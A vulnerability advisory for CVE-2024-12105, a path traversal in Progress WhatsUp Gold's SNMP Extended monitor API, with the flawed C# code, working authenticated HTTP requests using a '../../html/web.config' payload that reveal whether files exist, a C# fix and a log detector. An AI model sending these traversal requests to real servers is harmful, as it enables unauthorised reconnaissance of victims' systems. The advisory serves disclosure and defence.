CVE-2024-12105
A path traversal vulnerability exists in the handling of SnmpExtendedActiveMonitor requests in Progress WhatsUp Gold 24.0.1 Build 2177, Total Plus Edition. A specially crafted HTTP request can lead to information disclosure. An attacker can trigger this vulnerability by making an authenticated HTTP request.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Progress Software Corporation WhatsUp Gold 24.0.1 Build 2177, Total Plus Edition
WhatsUp Gold - https://www.whatsupgold.com/
6.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
WhatsUp Gold is a network monitoring and management software developed by Progress, a global software company. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.
The vulnerability is related to the SNMP Extended Active Monitor functionality. Unlike a standard SNMP monitor, which evaluates a single OID against a single threshold, the SNMP Extended monitor evaluates multiple OIDs against several thresholds by using an XML file with predefined values.
To turn on this functionality, an authenticated user needs to perform the following action:
Admin -> Monitors -> Action -> New -> SNMP Extended Monitor
Let us take a look at the controller implementation responsible for handling this action:
Line 1 // Controller
Line 2
Line 3 //WhatsUp.UI\WhatsUp\UI\Areas\Platform\ApiControllers\Monitors\Active\SnmpExtendedActiveMonitorController.cs
Line 4 [HttpGet]
Line 5 public HttpResponseMessage Action(string xmlFileName)
Line 6 {
Line 7 return this.GetResponse<IEnumerable<SnmpParameter>>((Func<IEnumerable<SnmpParameter>>) (() => this.SnmpImportWrapper.Import(xmlFileName)));
Line 8 }
Line 10 // Implementation
Line 11 // Ipswitch.WhatsUp.Application\Ipswitch\WhatsUp\Application\SnmpImportWrapper.cs
Line 12
Line 13 public IEnumerable<SnmpParameter> Import(string xmlName)
Line 14 {
Line 15 if (!(new XmlSerializer(typeof (SnmpParameterResult)).Deserialize((TextReader) File.OpenText(Path.Combine(this.GetXmlDirectory(), xmlName))) is SnmpParameterResult snmpParameterResult))
Line 16 return (IEnumerable<SnmpParameter>) new SnmpParameter[0];
Line 17 foreach (SnmpParameter parameter in snmpParameterResult.Parameters)
Line 18 {
Line 19 if (!string.IsNullOrWhiteSpace(((SnmpParameterBase) parameter).OID))
Line 20 {
Line 21 string description = this._mibProvider.GetDescription(((SnmpParameterBase) parameter).OID);
Line 22 if (!string.IsNullOrWhiteSpace(description))
Line 23 ((SnmpParameterBase) parameter).LongDescription = description;
Line 24 }
Line 25 }
Line 26 return (IEnumerable<SnmpParameter>) snmpParameterResult.Parameters;
Line 27 }
Apparent from the above is that the xmlName argument is fully controlled by an attacker and is passed, unchanged, as the File.OpenText argument at line 15. We can also observe that no path traversal protection is implemented: the directly controlled xmlName value is simply joined to the XML directory with Path.Combine at line 15, and Path.Combine performs no containment check (it even discards the first argument entirely when the second one is a rooted path). Such conditions allow the attacker to conduct a path traversal attack and check for the existence of any file within the file system, because the error message returned differs depending on whether the target file exists.
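As an added illustration (not WhatsUp Gold's code and not the vendor's patch), the following C# shows what Path.Combine actually does with the input from the advisory and how a caller such as Import could validate xmlName before handing it to File.OpenText. The SafeXmlPath and Resolve names, and the temporary base directory used in Main, are assumptions made for this example; the real directory, per the response below, is under the WhatsUp data folder.

```csharp
using System;
using System.IO;

// Added example, not WhatsUp Gold code. Shows why Path.Combine alone gives
// no containment guarantee and how to enforce one before File.OpenText.
public static class SafeXmlPath
{
    // Returns a canonical path inside xmlDirectory, or throws.
    // xmlDirectory stands in for GetXmlDirectory() from the advisory.
    public static string Resolve(string xmlDirectory, string xmlName)
    {
        if (string.IsNullOrWhiteSpace(xmlName))
            throw new ArgumentException("xmlName is required", nameof(xmlName));

        // A legitimate monitor definition is a bare file name: no separators,
        // no drive letter, no ".." component. Reject anything else up front.
        // (Path.GetFileName treats '\' as a separator on Windows only, which is
        // the platform this IIS-hosted product runs on.)
        if (xmlName != Path.GetFileName(xmlName) || xmlName == "." || xmlName == "..")
            throw new ArgumentException("xmlName must be a bare file name", nameof(xmlName));

        // Backstop: canonicalise and check the prefix. The trailing separator
        // matters, otherwise "...\SNMPExtended2\x" would pass for "...\SNMPExtended".
        string baseDir = Path.GetFullPath(xmlDirectory)
            .TrimEnd(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar)
            + Path.DirectorySeparatorChar;
        string full = Path.GetFullPath(Path.Combine(baseDir, xmlName));

        // Windows paths are case-insensitive, hence OrdinalIgnoreCase.
        if (!full.StartsWith(baseDir, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("path escapes the XML directory");

        return full;
    }

    public static void Main()
    {
        // Hypothetical base directory used only for the demonstration.
        string xmlDir = Path.Combine(Path.GetTempPath(), "SNMPExtended");

        // What the vulnerable code effectively does: Combine happily builds a
        // path that the file system resolves to a location outside xmlDir.
        string naive = Path.Combine(xmlDir, "../../html/web.config");
        Console.WriteLine("Path.Combine  -> " + Path.GetFullPath(naive));

        // Path.Combine also drops the base entirely when the name is rooted.
        Console.WriteLine("Rooted input  -> " + Path.Combine(xmlDir, Path.GetTempPath()));

        foreach (string name in new[] { "cpu.xml", "../../html/web.config", "..", @"C:\Windows\win.ini" })
        {
            try
            {
                Console.WriteLine($"{name,-28} accepted: {Resolve(xmlDir, name)}");
            }
            catch (Exception e) when (e is ArgumentException || e is UnauthorizedAccessException)
            {
                Console.WriteLine($"{name,-28} rejected: {e.Message}");
            }
        }
    }
}
```

The bare-file-name check is the real fix; the canonicalised prefix comparison is kept as a second layer so that a future change to the first check (or an unexpected separator handling difference) still cannot reach a file outside the directory.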
REQ
GET /NmConsole/api/core/snmpextendedactivemonitor?xmlFileName=../../html/web.config HTTP/2
Host: 172.18.234.223
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json
Cookie: ASP.NET_SessionId=42dbityo2emfybcisjvcollh; langid=1033; .ASPXAUTH=F417BA017E46946465A67C92ACA0B8F7BC9467A2EE280F1D8A4F64FD8DF73397225782C6F6B5C4D9E1E1C3625DBC53AD54D3C770B8B25F74AEBF1A83A658583221B1A5A9667A754D876F2F460D7FF570026F63E89F60EF18CC91E5F739858E0D
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://172.18.234.223/NmConsole/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
RESP when file EXISTS
HTTP/2 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; secure; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Xss-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Thu, 03 Oct 2024 13:47:40 GMT
Content-Length: 55
{"Message":"There is an error in XML document (2, 2)."}
Example when file DOES NOT exist
REQ
GET /NmConsole/api/core/snmpextendedactivemonitor?xmlFileName=XXX HTTP/2
Host: 172.18.234.223
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json
Cookie: ASP.NET_SessionId=42dbityo2emfybcisjvcollh; langid=1033; .ASPXAUTH=95435CCFAB2556821129119B8C55992247BE2D11CA65FDA9409BC8980A12AA3E9CDF151A91D86C987330A210FD1F003F580E7A900B625C00258550CC07BFB26EE1812468080130F8C4BFE741B9929CC7818F6E3189214104952D7FE93A2FDD09
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://172.18.234.223/NmConsole/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
RESP
HTTP/2 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; secure; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Xss-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Thu, 03 Oct 2024 15:22:08 GMT
Content-Length: 104
{"Message":"Could not find file 'C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\Data\\SNMPExtended\\XXX'."}
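The two exchanges above show the request shape a defender can look for: a GET to the snmpextendedactivemonitor endpoint whose xmlFileName value is not a bare file name, typically answered with a 500. Access logs do not record the response body, so the existence oracle itself (the differing error messages) is not visible there, but the request is. The following C# is an added example, not WhatsUp Gold code, that flags such entries in W3C-style IIS log lines; the log lines are constructed for the example, with the field order (date, time, method, uri-stem, uri-query, status) assumed.

```csharp
using System;
using System.Collections.Generic;
using System.Net;

// Added example, not WhatsUp Gold code: flags access-log entries that send a
// traversal-shaped xmlFileName value to the affected endpoint.
public static class TraversalLogCheck
{
    // Constructed W3C-style lines: date time cs-method cs-uri-stem cs-uri-query sc-status
    public static readonly string[] SampleLog =
    {
        "2024-10-03 13:47:40 GET /NmConsole/api/core/snmpextendedactivemonitor xmlFileName=cpu.xml 200",
        "2024-10-03 13:47:41 GET /NmConsole/api/core/snmpextendedactivemonitor xmlFileName=../../html/web.config 500",
        "2024-10-03 13:47:42 GET /NmConsole/api/core/snmpextendedactivemonitor xmlFileName=..%2F..%2Fhtml%2Fweb.config 500",
        "2024-10-03 13:47:43 GET /NmConsole/api/core/snmpextendedactivemonitor xmlFileName=C:%5CWindows%5Cwin.ini 500",
        "2024-10-03 15:22:08 GET /NmConsole/api/core/snmpextendedactivemonitor xmlFileName=XXX 500",
        "2024-10-03 15:22:09 GET /NmConsole/ - 200",
    };

    const string Endpoint = "/nmconsole/api/core/snmpextendedactivemonitor";

    // True when the decoded value is anything other than a bare file name.
    // One round of URL decoding covers what IIS writes into cs-uri-query.
    public static bool IsTraversalShaped(string rawValue)
    {
        string v = WebUtility.UrlDecode(rawValue);
        return v.Contains("..") || v.Contains('/') || v.Contains('\\') || v.Contains(':');
    }

    // Returns the log lines that target the endpoint with a suspicious xmlFileName.
    public static List<string> Flag(IEnumerable<string> lines)
    {
        var hits = new List<string>();
        foreach (string line in lines)
        {
            string[] f = line.Split(' ');
            if (f.Length < 6) continue;
            string stem = f[3], query = f[4];
            if (!stem.Equals(Endpoint, StringComparison.OrdinalIgnoreCase)) continue;

            foreach (string kv in query.Split('&'))
            {
                int eq = kv.IndexOf('=');
                if (eq < 0) continue;
                if (!kv.Substring(0, eq).Equals("xmlFileName", StringComparison.OrdinalIgnoreCase)) continue;
                if (IsTraversalShaped(kv.Substring(eq + 1)))
                {
                    hits.Add(line);
                    break;
                }
            }
        }
        return hits;
    }

    public static void Main()
    {
        // Expected: the three lines carrying "..", an encoded "..", and a drive letter.
        foreach (string hit in Flag(SampleLog))
            Console.WriteLine("SUSPICIOUS: " + hit);
    }
}
```

A plain "XXX" probe is not flagged, since a typo in a legitimate file name looks identical; a burst of 500s from one session against this endpoint is still worth correlating, because the vulnerability requires an authenticated account and the session in the captured requests identifies it.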
2024-11-13 - Vendor Disclosure
2024-12-09 - Vendor Patch Release
2025-01-08 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.